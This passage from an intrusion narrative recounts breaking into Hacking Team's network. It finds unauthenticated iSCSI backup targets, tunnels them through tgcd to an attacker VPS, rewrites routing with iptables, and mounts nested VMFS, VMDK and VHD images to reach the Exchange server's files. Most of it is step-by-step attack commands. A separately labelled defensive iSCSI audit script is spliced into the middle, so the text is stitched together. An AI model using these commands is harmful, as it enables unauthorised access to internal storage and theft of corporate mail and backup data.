Crossed Cables

Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it wasn't very useful. Their insecure backups were the vulnerability that opened their doors. According to their documentation [1], their iSCSI devices were supposed to be on a separate network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
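An added audit script, not part of the original text, that parses nmap iscsi-info output in the layout shown above and flags the two conditions the scan exposed: targets that require no authentication, and portals answering outside the dedicated storage network the documentation called for. The sample output, the hostname and the choice of 10.0.1.0/24 as the storage network are constructed assumptions.

```python
import ipaddress
import re

# Constructed sample in the layout of nmap's iscsi-info output (placeholder hostname;
# the 192.168.200.0/24 and 10.0.1.0/24 addresses mirror those in the text above).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for nas-backup.corp.example (192.168.200.72)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
"""

def parse_iscsi_targets(nmap_text):
    """Parse normal nmap output into [{"host", "targets": [{"iqn", "addresses", "auth"}]}]."""
    hosts, host, target = [], None, None
    for line in nmap_text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host = {"host": m.group(1), "targets": []}
            hosts.append(host)
            continue
        key, _, value = line.lstrip("|_ ").partition(":")  # drop the NSE gutter "| ", "|_ "
        if host is None or not value:
            continue  # port lines, the "iscsi-info:" header, anything outside a host block
        if key == "Target":
            target = {"iqn": value.strip(), "addresses": [], "auth": None}
            host["targets"].append(target)
        elif key == "Address" and target is not None:
            target["addresses"].append(value.strip())
        elif key == "Authentication" and target is not None:
            target["auth"] = value.strip()
    return hosts

def audit(hosts, storage_net):
    """Return (iqn, reason) pairs: no authentication, or a portal outside storage_net."""
    net = ipaddress.ip_network(storage_net)
    findings = []
    for h in hosts:
        for t in h["targets"]:
            if t["auth"] and "no authentication" in t["auth"].lower():
                findings.append((t["iqn"], "no authentication required"))
            for addr in t["addresses"]:  # "ip:port,portal-group"; IPv4 portals assumed
                ip = ipaddress.ip_address(addr.rsplit(":", 1)[0])
                if ip not in net:
                    findings.append((t["iqn"], f"portal {ip} outside {net}"))
    return findings
```

Run `audit(parse_iscsi_targets(open("scan.txt").read()), "10.0.1.0/24")` over a saved `nmap -p 3260 --script iscsi-info` run to get the same two findings per exposed target; any hit is a target to put behind CHAP and off the general network.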

iSCSI needs a kernel module, and it would've been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it because it thinks its IP is 192.168.200.72 instead of 127.0.0.1.

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like the most interesting. It was too big to download, but it was possible to mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and finally we've unpacked the Russian doll and can see all the files from the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf